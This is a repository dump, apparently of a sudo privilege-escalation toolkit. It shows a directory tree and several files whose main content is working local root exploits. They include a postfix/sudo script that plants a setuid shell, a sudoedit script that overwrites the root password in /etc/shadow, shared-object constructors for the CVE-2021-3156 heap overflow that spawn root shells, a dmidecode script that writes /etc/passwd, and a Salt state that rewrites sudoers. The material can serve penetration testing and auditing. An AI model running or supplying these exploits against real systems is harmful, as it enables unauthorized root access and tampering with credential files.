├── CHANGELOG.md ├── CVE ├── 3rdPartyApps │ ├── CVE-2013-4984.txt │ ├── CVE-2023-1326.txt │ ├── CVE-2023-26604.txt │ ├── CVE-2023-30630.txt │ ├── CVE-2023-32696.txt │ └── CVE-2023-32696 │ │ ├── Makefile │ │ ├── dmiwrite │ │ ├── dmiwrite.c │ │ ├── exploit-SK.sh │ │ ├── exploit.sh │ │ ├── passwd.backdoor │ │ ├── passwd.backup │ │ ├── restore.sh │ │ ├── util.c │ │ └── util.h ├── 3rdPartyDevices │ └── CVE-2023-36624.txt ├── CVE-1999-0958.txt ├── CVE-2002-0043.sh ├── CVE-2002-0184.txt ├── CVE-2005-1831.txt ├── CVE-2006-0151.perl ├── CVE-2006-0151.python ├── CVE-2010-1163.txt ├── CVE-2012-0809.txt ├── CVE-2012-0864-0809.c ├── CVE-2014-0106.txt ├── CVE-2015-5602.sh ├── CVE-2017-1000367-1.c ├── CVE-2017-1000367-2.c ├── CVE-2017-1000367.c ├── CVE-2019-14287.txt ├── CVE-2019-18634-pwfeedback │ ├── CVE-2019-18634.sh │ ├── exec.c │ ├── readme.txt │ ├── socat │ └── xpl.pl ├── CVE-2021-23240.txt ├── CVE-2021-3156 │ ├── CVE-2021-3156-notes.txt │ ├── CVE-2021-3156.txt │ ├── exploit1 │ │ ├── Makefile │ │ ├── README.md │ │ ├── brute.sh │ │ ├── hax.c │ │ └── lib.c │ ├── exploit2 │ │ └── CVE-2021-3156 │ │ │ ├── Makefile │ │ │ ├── hax.c │ │ │ └── lib.c │ └── exploit4 │ │ ├── link.txt │ │ ├── one shot │ │ ├── Makefile │ │ ├── README.md │ │ ├── exploit.c │ │ └── sice.c │ │ └── other │ │ ├── README.md │ │ ├── exploit │ │ ├── exploit.c │ │ └── one shot │ │ ├── Makefile │ │ ├── README.md │ │ ├── exploit.c │ │ └── sice.c ├── CVE-2022-3739 │ ├── 2022-3739.txt │ ├── libhax.c │ ├── rootslap.c │ └── slapd.conf ├── CVE-2022-45153 │ ├── CVE-2022-45153.txt │ └── ha_cluster_exploit.sls ├── CVE-2023-1326.sh ├── CVE-2023-22809.txt ├── cve.sudover.vuln.txt └── cve_updatev2.sh ├── FUNDING.yml ├── LICENSE ├── README.md ├── SK-Tools ├── Dangerous_env_var.txt ├── SK-ImperBruteForce-NoPwd.sh ├── SK-alias-sudoers.sh ├── SK-app-check.sh ├── SK-credHarvest2.sh ├── SK-csuid-with-sudo.sh ├── SK-recursive-impersonate-audit.sh ├── SK-recursive-impersonate.sh ├── SK-relative-path.sh ├── SK-runas.sh ├── 
SK-search-sudoers.sh ├── SK-su-BruteForce.sh ├── SK-ttyInject.sh ├── passwords.txt ├── ttyInject.py ├── userpwd.txt └── users.txt ├── SUDO_KILLERv3.sh ├── dbins ├── 7z.txt ├── Dangerous_env_var.txt ├── aa-exec.txt ├── ab.txt ├── absolute_path-sudoedit.txt ├── agetty.txt ├── alpine.txt ├── anansi_util.txt ├── ansible-playbook.txt ├── ansible-test.txt ├── aoss.txt ├── apache2.txt ├── apache2ctl.txt ├── apt-get.txt ├── apt.txt ├── ar.txt ├── aria2c.txt ├── arj.txt ├── arp.txt ├── as.txt ├── ascii-xfr.txt ├── ascii85.txt ├── ash.txt ├── aspell.txt ├── at.txt ├── atobm.txt ├── awk.txt ├── aws.txt ├── base32.txt ├── base58.txt ├── base64.txt ├── basenc.txt ├── basez.txt ├── bash.txt ├── batcat.txt ├── bc.txt ├── bconsole.txt ├── bins.txt ├── bpftrace.txt ├── bridge.txt ├── bundle.txt ├── bundler.txt ├── busctl.txt ├── busybox.txt ├── byebug.txt ├── bzip2.txt ├── c89.txt ├── c99.txt ├── cabal.txt ├── cancel.txt ├── capsh.txt ├── cat.txt ├── cdist.txt ├── certbot.txt ├── check_by_ssh.txt ├── check_cups.txt ├── check_log.txt ├── check_memory.txt ├── check_raid.txt ├── check_ssl_cert.txt ├── check_statusfile.txt ├── chmod.txt ├── choom.txt ├── chown.txt ├── chroot.txt ├── clamscan.txt ├── cmp.txt ├── cobc.txt ├── column.txt ├── comm.txt ├── composer.txt ├── cowsay.txt ├── cowthink.txt ├── cp.txt ├── cpan.txt ├── cpio.txt ├── cpulimit.txt ├── crash.txt ├── crontab.txt ├── csh.txt ├── csplit.txt ├── csvtool.txt ├── cupsfilter.txt ├── curl.txt ├── cut.txt ├── dash.txt ├── date.txt ├── dc.txt ├── dd.txt ├── debugfs.txt ├── dialog.txt ├── diff.txt ├── dig.txt ├── distcc.txt ├── dmesg.txt ├── dmidecode.txt ├── dmsetup.txt ├── dnf.txt ├── docker.txt ├── docker_exp.txt ├── dos2unix.txt ├── dosbox.txt ├── dotnet.txt ├── dpkg.txt ├── dstat.txt ├── dvips.txt ├── easy_install.txt ├── eb.txt ├── ed.txt ├── efax.txt ├── elvish.txt ├── emacs.txt ├── env.txt ├── eqn.txt ├── espeak.txt ├── ex.txt ├── exiftool.txt ├── expand.txt ├── expect.txt ├── facter.txt ├── file.txt ├── find.txt ├── 
finger.txt ├── fish.txt ├── flask.txt ├── flock.txt ├── fmt.txt ├── fold.txt ├── fping.txt ├── ftp.txt ├── gawk.txt ├── gcc.txt ├── gcloud.txt ├── gcore.txt ├── gdb.txt ├── gem.txt ├── genie.txt ├── genisoimage.txt ├── ghc.txt ├── ghci.txt ├── gimp.txt ├── ginsh.txt ├── git.txt ├── grc.txt ├── grep.txt ├── gtester.txt ├── gzip.txt ├── hd.txt ├── head.txt ├── hexdump.txt ├── highlight.txt ├── hping3.txt ├── iconv.txt ├── iftop.txt ├── install.txt ├── ionice.txt ├── ip.txt ├── irb.txt ├── ispell.txt ├── jjs.txt ├── joe.txt ├── join.txt ├── journalctl.txt ├── jq.txt ├── jrunscript.txt ├── jtag.txt ├── julia.txt ├── knife.txt ├── ksh.txt ├── ksshell.txt ├── ksu.txt ├── kubectl.txt ├── latex.txt ├── latexmk.txt ├── ld.so.txt ├── ldconfig.txt ├── less.txt ├── lftp.txt ├── ln.txt ├── loginctl.txt ├── logsave.txt ├── look.txt ├── lp.txt ├── ltrace.txt ├── lua.txt ├── lualatex.txt ├── luatex.txt ├── lwp-download.txt ├── lwp-request.txt ├── mail.txt ├── make.txt ├── man.txt ├── mawk.txt ├── minicom.txt ├── more.txt ├── mosquitto.txt ├── mount.txt ├── msfconsole.txt ├── msgattrib.txt ├── msgcat.txt ├── msgconv.txt ├── msgfilter.txt ├── msgmerge.txt ├── msguniq.txt ├── mtr.txt ├── multitime.txt ├── mv.txt ├── mysql.txt ├── nano.txt ├── nasm.txt ├── nawk.txt ├── nc.txt ├── ncdu.txt ├── ncftp.txt ├── neofetch.txt ├── nft.txt ├── nice.txt ├── nl.txt ├── nm.txt ├── nmap.txt ├── node.txt ├── nohup.txt ├── npm.txt ├── nroff.txt ├── nsenter.txt ├── octave.txt ├── od.txt ├── openssl.txt ├── openvpn.txt ├── openvt.txt ├── opkg.txt ├── pandoc.txt ├── paste.txt ├── pax.txt ├── pdb.txt ├── pdflatex.txt ├── pdftex.txt ├── perf.txt ├── perl.txt ├── perlbug.txt ├── pexec.txt ├── pg.txt ├── php.txt ├── pic.txt ├── pico.txt ├── pidstat.txt ├── pip.txt ├── pip3.txt ├── pkexec.txt ├── pkg.txt ├── posh.txt ├── pr.txt ├── pry.txt ├── psftp.txt ├── psql.txt ├── ptx.txt ├── puppet.txt ├── pwfeedback.txt ├── pwsh.txt ├── python.txt ├── python2.txt ├── python3.txt ├── rake.txt ├── rb.txt ├── rc.txt 
├── readelf.txt ├── red.txt ├── redcarpet.txt ├── redis.txt ├── restic.txt ├── rev.txt ├── rlogin.txt ├── rlwrap.txt ├── rpm.txt ├── rpmdb.txt ├── rpmquery.txt ├── rpmverify.txt ├── rsync.txt ├── rtorrent.txt ├── ruby.txt ├── run-mailcap.txt ├── run-parts.txt ├── rview.txt ├── rvim.txt ├── sash.txt ├── scanmem.txt ├── scp.txt ├── screen.txt ├── script.txt ├── scrot.txt ├── sed.txt ├── service.txt ├── setarch.txt ├── setfacl.txt ├── setlock.txt ├── sftp.txt ├── sg.txt ├── shuf.txt ├── slsh.txt ├── smbclient.txt ├── snap.txt ├── socat.txt ├── socket.txt ├── soelim.txt ├── softlimit.txt ├── sort.txt ├── split.txt ├── sqlite3.txt ├── sqlmap.txt ├── ss.txt ├── ssh-agent.txt ├── ssh-keygen.txt ├── ssh-keyscan.txt ├── ssh.txt ├── sshpass.txt ├── start-stop-daemon.txt ├── stdbuf.txt ├── step1.out ├── strace.txt ├── strings.txt ├── su.txt ├── sudo.txt ├── sysctl.txt ├── syst-resolve.txt ├── systemctl.txt ├── systemd-resolve.txt ├── tac.txt ├── tail.txt ├── tar.txt ├── task.txt ├── taskset.txt ├── tasksh.txt ├── tbl.txt ├── tclsh.txt ├── tcpdump.txt ├── tdbtool.txt ├── tee.txt ├── telnet.txt ├── terraform.txt ├── tex.txt ├── tftp.txt ├── tic.txt ├── time.txt ├── timedatectl.txt ├── timeout.txt ├── tmate.txt ├── tmux.txt ├── top.txt ├── torify.txt ├── torsocks.txt ├── troff.txt ├── tshark.txt ├── ul.txt ├── unexpand.txt ├── uniq.txt ├── unshare.txt ├── unsquashfs.txt ├── unzip.txt ├── update-alternatives.txt ├── update │ ├── SK_dbins_update.sh │ ├── bins_07-02-24.txt │ ├── conca-new.txt │ ├── conca-temp.txt │ ├── newAdd │ │ └── notes.md │ └── old │ │ ├── bins_25-01-24.txt │ │ └── bins_31-07-23.txt ├── uudecode.txt ├── uuencode.txt ├── vagrant.txt ├── valgrind.txt ├── varnishncsa.txt ├── vi.txt ├── view.txt ├── viff.txt ├── vigr.txt ├── vim.txt ├── vimdiff.txt ├── vipw.txt ├── virsh.txt ├── volatility.txt ├── w3m.txt ├── wall.txt ├── watch.txt ├── wc.txt ├── wget.txt ├── whiptail.txt ├── whois.txt ├── wireshark.txt ├── wish.txt ├── xargs.txt ├── xdg-user-dir.txt ├── 
xdotool.txt ├── xelatex.txt ├── xetex.txt ├── xmodmap.txt ├── xmore.txt ├── xpad.txt ├── xxd.txt ├── xz.txt ├── yarn.txt ├── yash.txt ├── yelp.txt ├── yum.txt ├── zathura.txt ├── zip.txt ├── zsh.txt ├── zsoelim.txt └── zypper.txt ├── notes ├── Excessive_directory_rights.txt ├── SHELL_BUILTIN.md ├── chown-hR.txt ├── env_exploit.txt ├── execessive_priv.txt ├── file_owner_hijacking(chown).txt ├── file_owner_hijacking(rsync).txt ├── file_owner_hijacking(tar).txt ├── file_permission_hijacking.txt ├── notes.txt ├── owner_direc_missing_file.txt ├── redirect-traffic-apt.txt ├── sudo_caching.txt └── user_impersonation.txt └── res ├── Dangerous_env_var.txt ├── Env_exploit.so ├── Env_exploit2.so ├── SK-alias-sudoers.sh ├── SK-app-check.sh ├── SK-csuid-with-sudo.sh ├── SK-recursive-impersonate.sh ├── SK-relative-path.sh ├── SK-search-sudoers.sh ├── SK-su-BruteForce.sh ├── SK-sudo-list.sh ├── SK-ttyInject.sh ├── SK_dbins_update.sh ├── SK_update_txt.sh ├── credHarvest ├── credHarvest.sh ├── extract.sh ├── hudo.c ├── ld_library.c ├── passwords.txt ├── sudo_injec ├── README.md ├── activate_sudo_token ├── exploit.sh ├── exploit_v2.sh ├── exploit_v3.sh └── slides_breizh_2019.pdf ├── sys_bins.txt ├── ttyInject.py ├── userpwd.txt └── users.txt /CVE/3rdPartyApps/CVE-2023-1326.txt: -------------------------------------------------------------------------------- 1 | The apport-cli supports view a crash. These features invoke the default 2 | pager, which is likely to be less, other functions may apply. 3 | 4 | It can be used to break out from restricted environments by spawning an 5 | interactive system shell. If the binary is allowed to run as superuser 6 | by sudo, it does not drop the elevated privileges and may be used to 7 | access the file system, escalate or maintain privileged access. 8 | 9 | apport-cli should normally not be called with sudo or pkexec. In case it 10 | is called via sudo or pkexec execute `sensible-pager` as the original 11 | user to avoid privilege elevation. 
12 | 13 | Proof of concept: 14 | 15 | ``` 16 | $ sudo apport-cli -c /var/crash/xxx.crash 17 | [...] 18 | Please choose (S/E/V/K/I/C): v 19 | !id 20 | uid=0(root) gid=0(root) groups=0(root) 21 | !done (press RETURN) 22 | ``` 23 | 24 | This fixes CVE-2023-1326. 25 | 26 | Bug: https://launchpad.net/bugs/2016023 27 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696.txt: -------------------------------------------------------------------------------- 1 | Bugs 2 | The ckan user (equivalent to www-data) owned code and configuration files in the docker container. 3 | 4 | The ckan user had the permissions to use sudo 5 | 6 | Package: 7 | ckan-base (Docker) 8 | 9 | Affected versions: 10 | <2.9.9, <2.10.1 11 | 12 | Patched versions: 13 | 2.9.9, 2.10.1 14 | 15 | -------------- 16 | 17 | Package: 18 | ckan-dev (Docker) 19 | 20 | Affected versions: 21 | <2.9.9, <2.10.1 22 | 23 | Patched versions: 24 | 2.9.9, 2.10.1 25 | 26 | Impact 27 | These bugs allow for (1) code execution or (2) privilege escalation if an arbitrary file write bug is available. 
28 | 29 | Patches 30 | These vulnerabilities have been fixed in the images tagged ckan-base:2.9.9, ckan-base:2.9.9-dev, ckan-base:2.10.1 and ckan-base:2.10.1-dev 31 | 32 | ---------- 33 | 34 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS = -W -Wall -Wshadow -Wstrict-prototypes -Wpointer-arith -Wcast-qual \ 2 | -Wcast-align -Wwrite-strings -Wmissing-prototypes -Winline -Wundef 3 | 4 | #CFLAGS += -DDEBUG 5 | 6 | all: dmiwrite 7 | 8 | dmiwrite: 9 | gcc $(CFLAGS) dmiwrite.c util.c -o dmiwrite 10 | 11 | clean: 12 | rm -f dmiwrite 13 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/dmiwrite: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/CVE/3rdPartyApps/CVE-2023-32696/dmiwrite -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/restore.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | #!/bin/bash 4 | 5 | # This script will compile and test the exploit. 
6 | # On the vulnerable system, execution will look something like this: 7 | # 8 | # sudo dmidecode -d evil.dmi --dump-bin /etc/shadow 9 | # 10 | 11 | set -o nounset 12 | set -o errexit 13 | 14 | #cat /etc/passwd > $PWD/passwd.backup 15 | 16 | #who=$(whoami 2>/dev/null) 17 | #id=$(id | cut -d "(" -f 1 | sed 's/uid=//g' 2>/dev/null) 18 | 19 | #cat /etc/passwd | sed "s/$who:x:$id/$who:x:0/g" > "$PWD/passwd.backdoor" 20 | 21 | payload_file="$PWD/passwd.backup" 22 | write_file='/etc/passwd' 23 | 24 | # # the crafted DMI file to generate 25 | dmi_file='/tmp/sk-rstr.dmi' 26 | 27 | # # this option is not present on older versions of dmidecode 28 | flags="--no-sysfs" 29 | 30 | rm -f "${dmi_file}" 31 | 32 | #"${write_file}" 33 | 34 | make dmiwrite 35 | 36 | ./dmiwrite "${payload_file}" "${dmi_file}" 37 | 38 | sudo /usr/sbin/dmidecode "${flags}" -d "${dmi_file}" --dump-bin "${write_file}" 39 | 40 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/util.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #ifndef DEBUG 4 | #define DEBUG false 5 | #endif 6 | 7 | typedef unsigned char u8; 8 | typedef unsigned int u32; 9 | typedef unsigned short u16; 10 | 11 | int set_checksum(u8 *buf, size_t offset, size_t len); 12 | int checksum(const u8 *buf, size_t len); 13 | bool smbios_decode_check (const u8 *buf); 14 | 15 | bool set_checksums(u8 *buf); 16 | -------------------------------------------------------------------------------- /CVE/CVE-1999-0958.txt: -------------------------------------------------------------------------------- 1 | > There is a bug in sudo versions (at least) 1.5.2 and 1.5.3 on NCR's MP-RAS 2 | > that makes it trivial to bypass sudo's restrictions. I reported this to 3 | > the sudo-bugs address given in the source on 12/23/97, but never heard back, 4 | > so screw 'em. 
It is important to note that MP-RAS is one of the platforms 5 | > listed in the RUNSON file included with the distribution, so there are 6 | > probably many people running this; I imagine you will want to reconsider it 7 | > if you are one of them. 8 | 9 | This bug exists on all platforms. Sudo does not handle relative directories 10 | properly . ../../../usr/bin/date would also bypasses the access list. 11 | 12 | In short inclusion lists are are safe. Exclusion lists are not safe. 13 | 14 | > --jml -------------------------------------------------------------------------------- /CVE/CVE-2002-0043.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # root shell exploit for postfix + sudo 4 | # tested on debian powerpc unstable 5 | # 6 | # by Charles 'core' Stevenson 7 | 8 | # Put your password here if you're not in the sudoers file 9 | PASSWORD=wdnownz 10 | 11 | echo -e "sudo exploit by core \n" 12 | 13 | echo "Setting up postfix config directory..." 14 | /bin/cp -r /etc/postfix /tmp 15 | 16 | echo "Adding malicious debugger command..." 17 | echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf 18 | 19 | echo "Setting up environment..." 20 | export MAIL_CONFIG=/tmp/postfix 21 | export MAIL_DEBUG= 22 | 23 | sleep 2 24 | 25 | echo "Trying to exploit..." 26 | echo -e "$PASSWORD\n"|/usr/bin/sudo su - 27 | 28 | sleep 2 29 | 30 | echo "We should have a root shell let's check..." 31 | ls -l /tmp/sh 32 | 33 | echo "Cleaning up..." 34 | rm -rf /tmp/postfix 35 | 36 | echo "Attempting to run root shell..." 
37 | /tmp/sh -------------------------------------------------------------------------------- /CVE/CVE-2015-5602.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # CVE-2015-5602 exploit by t0kx 3 | # https://github.com/t0kx/privesc-CVE-2015-5602 4 | 5 | export EDITOR="/tmp/edit" 6 | export FOLDER="${RANDOM}" 7 | export PASSWD=$(printf ${RANDOM} \ 8 | | md5sum \ 9 | | awk '{print $1}') 10 | 11 | prepare() { 12 | cat << EOF >> /tmp/edit 13 | #!/usr/bin/env bash 14 | pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))" 15 | sed -i -e "s,^root:[^:]\+:,root:\${pass}:," \${1} 16 | EOF 17 | } 18 | 19 | main() { 20 | printf "[+] CVE-2015-5602 exploit by t0kx\n" 21 | printf "[+] Creating folder...\n" 22 | mkdir -p /home/${USER}/${FOLDER}/ 23 | printf "[+] Creating symlink\n" 24 | ln -sf /etc/shadow /home/${USER}/${FOLDER}/esc.txt 25 | printf "[+] Modify EDITOR...\n" 26 | prepare && chmod +x ${EDITOR} 27 | printf "[+] Change root password to: ${PASSWD}\n" 28 | sudoedit /home/${USER}/${FOLDER}/esc.txt 29 | printf "[+] Done\n" 30 | }; main -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/CVE-2019-18634.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # You will need socat to run this. 
3 | # You can download a static version of socat here: https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat 4 | gcc -w exec.c -o /tmp/pipe 5 | ./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"& 6 | sleep 0.5 7 | export SUDO_ASKPASS=/tmp/pipe 8 | sudo -k -S id < /tmp/pty 9 | /tmp/pipe 10 | -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/exec.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(void) 9 | { 10 | printf("Exploiting!\n"); 11 | int fd = open("/proc/self/exe", O_RDONLY); 12 | struct stat st; 13 | fstat(fd, &st); 14 | if (st.st_uid != 0) 15 | { 16 | fchown(fd, 0, st.st_gid); 17 | fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); 18 | } 19 | else 20 | { 21 | setuid(0); 22 | execve("/bin/bash",NULL,NULL); 23 | } 24 | return 0; 25 | } 26 | -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/readme.txt: -------------------------------------------------------------------------------- 1 | This exploited was tested on sudo version 1.8.25. It should be noted that depending of the version and which linux-based OS it is (e.g. Ubuntu or Archlinux), the offset changes. 2 | In order to exploit other version of sudo, you will need to change the initial exploit a bit (mostly the offset). 3 | 4 | "1.8.21": 0x270 5 | "1.8.25": 0x256 6 | "1.8.30": 0x224 7 | 8 | The exploited provided in SK makes use of SOCAT and perl, an executable copy of socat is provided in this directory, else you can download it. 
Credit goes to: https://github.com/Plazmaz/CVE-2019-18634 (note: the overflow is in sudo's password-feedback code, so the target must have `Defaults pwfeedback` set in sudoers, as the directory name indicates)
"\n"); 16 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit1/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | rm -rf libnss_X 3 | mkdir libnss_X 4 | gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c 5 | gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 6 | brute: all 7 | gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 8 | clean: 9 | rm -rf libnss_X sudo-hax-me-a-sandwich 10 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit1/lib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static void __attribute__ ((constructor)) _init(void); 7 | 8 | static void _init(void) { 9 | printf("[+] bl1ng bl1ng! We got it!\n"); 10 | #ifndef BRUTE 11 | setuid(0); seteuid(0); setgid(0); setegid(0); 12 | static char *a_argv[] = { "sh", NULL }; 13 | static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; 14 | execv("/bin/sh", a_argv); 15 | #endif 16 | } 17 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit2/CVE-2021-3156/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | rm -rf libnss_X 3 | mkdir libnss_X 4 | gcc -o sudo-hax-me-a-sandwich hax.c 5 | gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 6 | clean: 7 | rm -rf libnss_X sudo-hax-me-a-sandwich 8 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit2/CVE-2021-3156/lib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static void __attribute__ ((constructor)) _init(void); 7 | 8 | static void _init(void) { 9 | printf("[+] bl1ng bl1ng! 
We got it!\n"); 10 | setuid(0); seteuid(0); setgid(0); setegid(0); 11 | static char *a_argv[] = { "sh", NULL }; 12 | static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; 13 | execv("/bin/sh", a_argv); 14 | } 15 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/link.txt: -------------------------------------------------------------------------------- 1 | https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot 2 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc exploit.c -o exploit 3 | mkdir libnss_X 4 | gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2 5 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/README.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | **Note: The libnss_X directory must be present in the present working directory while running the exploit** 4 | ## ubuntu 18.04 5 | ![usage](https://i.imgur.com/8aYRP1G.png) 6 | 7 | ## ubuntu 20.04 8 | ![usage](https://i.imgur.com/5XWVFHb.png) 9 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/sice.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute((constructor)) 6 | static void sice() { 7 | setuid(0); 8 | system("id"); 9 | system("bash"); 10 | exit(0); 11 | } 12 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/README.md: -------------------------------------------------------------------------------- 1 | [Demo video](https://twitter.com/r4j0x00/status/1355489323794108417) 2 | [One shot 
exploit](https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot) 3 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/CVE/CVE-2021-3156/exploit4/other/exploit -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc exploit.c -o exploit 3 | mkdir libnss_X 4 | gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2 5 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/README.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | **Note: The libnss_X directory must be present in the present working directory while running the exploit** 4 | ## ubuntu 18.04 5 | ![usage](https://i.imgur.com/8aYRP1G.png) 6 | 7 | ## ubuntu 20.04 8 | ![usage](https://i.imgur.com/5XWVFHb.png) 9 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/sice.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute((constructor)) 6 | static void sice() { 7 | setuid(0); 8 | system("id"); 9 | system("bash"); 10 | exit(0); 11 | } 12 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/libhax.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | __attribute__ ((__constructor__)) 5 | void dropshell(void){ 6 | chown("/tmp/slapper/rootslap", 0, 0); 7 | chmod("/tmp/slapper/rootslap", 
04755); 8 | printf("[+] done!\n"); 9 | } 10 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/rootslap.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main(void){ 3 | setuid(0); 4 | setgid(0); 5 | seteuid(0); 6 | setegid(0); 7 | execvp("/bin/sh", NULL, NULL); 8 | } 9 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/slapd.conf: -------------------------------------------------------------------------------- 1 | modulepath /tmp/slapper 2 | moduleload libhax.so 3 | -------------------------------------------------------------------------------- /CVE/CVE-2022-45153/ha_cluster_exploit.sls: -------------------------------------------------------------------------------- 1 | {% set tmp_sudoers = '/tmp/sudoers' %} 2 | {% set sudoers = '/etc/sudoers' %} 3 | 4 | sudoers_backup: 5 | file.copy: 6 | - name: {{ tmp_sudoers }} 7 | - source: {{ sudoers }} 8 | - unless: cat {{ sudoers }} | grep adm 9 | 10 | sudoers_append: 11 | file.append: 12 | - name: {{ tmp_sudoers }} 13 | - text: | 14 | adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_* 15 | - require: 16 | - sudoers_backup 17 | 18 | sudoers_check: 19 | cmd.run: 20 | - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }} 21 | - require: 22 | - sudoers_append 23 | 24 | sudoers_edit: 25 | file.copy: 26 | - name: {{ sudoers }} 27 | - source: {{ tmp_sudoers }} 28 | - force: true 29 | - require: 30 | - sudoers_check 31 | -------------------------------------------------------------------------------- /CVE/CVE-2023-1326.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # root shell exploit for postfix + sudo 4 | # tested on debian powerpc unstable 5 | # 6 | # inspired by https://github.com/diego-tella/CVE-2023-1326-PoC 7 | 8 | # check that apport-client is installed, control version is lower than 2.26.0 
9 | 10 | apport_version=apport-cli -v 11 | if $version < 2.26.0 12 | then 13 | echo "version ok" 14 | fi 15 | 16 | # create a crash file 17 | touch /var/crash.file 18 | 19 | # exploit 20 | sudo /usr/bin/apport-cli -c /var/crash.file 21 | # then press V (view report) 22 | echo "V" 23 | # and launch bash => !/bin/bash 24 | !/bin/bash 25 | -------------------------------------------------------------------------------- /FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: TH3xACE 2 | patreon: TH3xACE 3 | -------------------------------------------------------------------------------- /SK-Tools/Dangerous_env_var.txt: -------------------------------------------------------------------------------- 1 | *=()* 2 | BASH_ENV 3 | __BASH_FUNC< 4 | BASH_FUNC_ 5 | BASHOPTS 6 | CDPATH 7 | ENV 8 | FPATH 9 | GLOBIGNORE 10 | HOSTALIASES 11 | IFS 12 | JAVA_TOOL_OPTIONS 13 | LD_* 14 | LOCALDOMAIN 15 | NLSPATH 16 | NULLCMD 17 | PATH_LOCALE 18 | PERL5DB 19 | PERL5LIB 20 | PERL5OPT 21 | PERLIO_DEBUG 22 | PERLLIB 23 | PS4 24 | PYTHONHOME 25 | PYTHONINSPECT 26 | PYTHONPATH 27 | PYTHONUSERBASE 28 | READNULLCMD 29 | RES_OPTIONS 30 | _RLD* 31 | RUBYLIB 32 | RUBYOPT 33 | SHELLOPTS 34 | TERMCAP 35 | TERMINFO 36 | TERMINFO_DIRS 37 | TERMPATH 38 | TMPPREFIX 39 | ZDOTDIR 40 | -------------------------------------------------------------------------------- /SK-Tools/SK-runas.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This script was developed to parse and search for specifc aliases by providing sudoers file 3 | # V1: Date Created : 08/12/2018 4 | # V2: Date Created : 11/02/2020 5 | # V3: Date Created : 20/07/2023 6 | # Date of last modification : 20/07/2023 7 | # @TH3xACE - BLAIS David 8 | # https://github.com/TH3xACE/SUDO_KILLER 9 | 10 | 11 | #!/bin/bash 12 | 13 | # Check if a username and command are provided as arguments 14 | if [ "$#" -lt 2 ]; then 15 | echo 